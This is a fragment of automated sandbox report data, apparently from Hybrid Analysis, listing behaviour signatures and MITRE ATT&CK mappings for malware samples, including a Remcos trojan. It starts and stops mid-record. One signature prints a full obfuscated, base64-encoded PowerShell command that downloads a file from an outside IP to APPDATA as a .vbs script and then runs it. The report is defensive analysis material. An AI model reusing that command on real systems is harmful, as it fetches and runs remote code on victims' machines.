\"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"csc.exe\" opened \"\\Device\\KsecDD\"\n \"cvtres.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "target-110", "type": 9, "relevance": 5, "name": "Executes powershell with commandline", "description": "Process \"powershell.exe\" with commandline \"-ex bypASS -NOP -w 1 -C DeviCECredEnTiaLdeploYmeNt ; iEX($(IEx('[sYStEM.TEXT.encOdinG]'+[cHar]0x3a+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING('+[ChAr]34+'JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi'+[ChAr]34+'))')))\"\" (UID: 00000000-00006096)", "origin": "Monitored Target", "attck_id": "T1059.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "network-61", "type": 7, "relevance": 10, "name": "GETs files from a webserver", "description": "\"GET /430/goodgirlalwaysbeagoodgirlwithbetterpersongood.gIF HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: <IPv4>\nConnection: Keep-Alive\" Response ==> HTTP/1.1 404 Not Found\nDate: Mon\n 10 Feb 2025 08:51:17 GMT\nServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25\nContent-Length: 298\nKeep-Alive: timeout=5\n max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=iso-8859-1 with response body ==>3C21444F43545950452048544D4C205055424C494320222D2F2F494554462F2F4454442048544D4C20322E302F2F454E223E0A3C68746D6C3E3C686561643E0A.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "target-57", "type": 9, "relevance": 10, "name": "Invokes the C# compiler", "description": "Process \"csc.exe\" with commandline \"/noconfig /fullpaths @\"%TEMP%\\\\bbotlxd5\\\\bbotlxd5.cmdline\"\" (UID: 00000000-00005220)", "origin": "Monitored Target", "attck_id": "T1027.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-509", "type": 2, "relevance": 5, "name": "Commandline contains long base64 encoded string", "description": "Commandline contains long base64 encoded string \"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFE.......\" in [Source : 00000000-00002724]\n Commandline contains long base64 encoded string \"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFE.......\" in [Source : cmd.exe]\n Commandline contains long base64 encoded string \"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFE.......\" in [Source : powershell.exe]", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-78", "type": 8, "relevance": 5, "name": "High entropy HTML file", "description": "Sample file \"en-US.4\" has high entropy 5.525633053475079\n Sample file \"ModuleAnalysisCache\" has high entropy 5.015147942055936\n Sample file \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has high entropy 7.945621402987342\n Sample file \"bbotlxd5.out\" has high entropy 5.392391176365807\n Sample file \"3130B1871A126520A8C47861EFE3ED4D\" has high entropy 7.116440023338203\n Sample file \"bbotlxd5.cmdline\" has high entropy 5.302279247550033\n Sample file \"suggestions_1_.en-US\" has high entropy 5.525633053475079", "origin": "Binary File", "attck_id": "T1027.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-5", "type": 8, "relevance": 10, "name": "Drops cabinet archive files", "description": "\"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 4761 bytes 1 file at 0x2c +A \"disallowedcert.stl\" number 1 1 datablock 0x1 compression\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00006096]", "origin": "Binary File", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"bbotlxd5.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\bbotlxd5\\bbotlxd5.dll]- [targetUID: 00000000-00006096]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"powershell.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 6096)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"powershell.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00006096)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"powershell.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"powershell.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"powershell.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"powershell.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"powershell.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"powershell.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\eznbtczr.xg0.ps1\" with delete access\n \"powershell.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nrw3pgpb.u0j.psm1\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\eznbtczr.xg0.ps1\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nrw3pgpb.u0j.psm1\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.tmp\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.err\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.out\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.0.cs\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.dll\" for deletion\n \"powershell.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bbotlxd5\\bbotlxd5.cmdline\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Exploit/Shellcode", "identifier": "api-88", "type": 6, "relevance": 10, "name": "Possible heap spraying attempt detected", "description": "\"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 100 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 101 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 102 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 103 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 104 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 105 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 106 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 107 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 108 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 109 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 110 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 111 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 112 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 113 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 114 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 115 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 116 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 117 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 118 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 119 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 120 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 121 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 122 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 123 calls\n \"powershell.exe\" allocated at least 32768.0 KB of consecutive memory with 124 calls", "origin": "API Call", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"powershell.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" (Handle: 648)\n \"powershell.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" (Handle: 648)\n \"powershell.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" (Handle: 648)\n \"csc.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe\" (Handle: 196)\n \"csc.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe\" (Handle: 196)\n \"csc.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe\" (Handle: 196)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}]}
02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671
https://hybrid-analysis.com/sample/02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671
Hybrid Analysis - Remcos
{"size": 494080, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "file.exe", "sha256": "02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671", "av_detect": 91, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 5, "total_signatures": 292, "extracted_files": [{"name": "remcos.exe", "file_path": "%ALLUSERSPROFILE%\\tst\\remcos.exe", "file_size": 494080, "sha256": "02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "file.exe (PID: 5804)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23, "file_available_to_download": true}, {"name": "remcos.exe.bin", "file_size": 494080, "sha256": "02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23, "file_available_to_download": true}, {"name": "dism.log", "file_size": 279678, "sha256": "df65d18540c015643b0cb338e09cf1e7e5671860054a8cd88ef99c26f290749f", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.6712E6A3.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "json_1_.json", "file_size": 962, "sha256": "c6a4288a3f28924cb11b2a6ed125510f022cb83076f52b71e7ec5cd85b0b1d72", "type_tags": ["data"], "description": "JSON data", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00005804", "name": "file.exe", "normalized_path": "C:\\file.exe", "sha256": "02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23}, {"uid": "00000000-00005888", "parentuid": "00000000-00005804", "name": "remcos.exe", "normalized_path": "%ALLUSERSPROFILE%\\tst\\remcos.exe", "sha256": "02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23}, {"uid": "00000000-00006132", "parentuid": "00000000-00005888", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\internet explorer\\iexplore.exe", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00001852", "name": "remcos.exe", "normalized_path": "%ALLUSERSPROFILE%\\tst\\remcos.exe", "sha256": "02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671", "av_label": "Trojan.Remcos", "av_matched": 16, "av_total": 23}, {"uid": "00000000-00004240", "parentuid": "00000000-00001852", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\internet explorer\\iexplore.exe", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}], "mitre_attcks": [{"tactic": "Reconnaissance", "technique": "IP Addresses", "attck_id": "T1590.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Gather Victim Network Information", "attck_id": "T1590", "attck_id_wiki": "https://attack.mitre.org/techniques/T1590"}}, {"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 16}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Malicious File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002", "malicious_identifiers_count": 2, "parent": {"technique": "User Execution", "attck_id": "T1204", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, 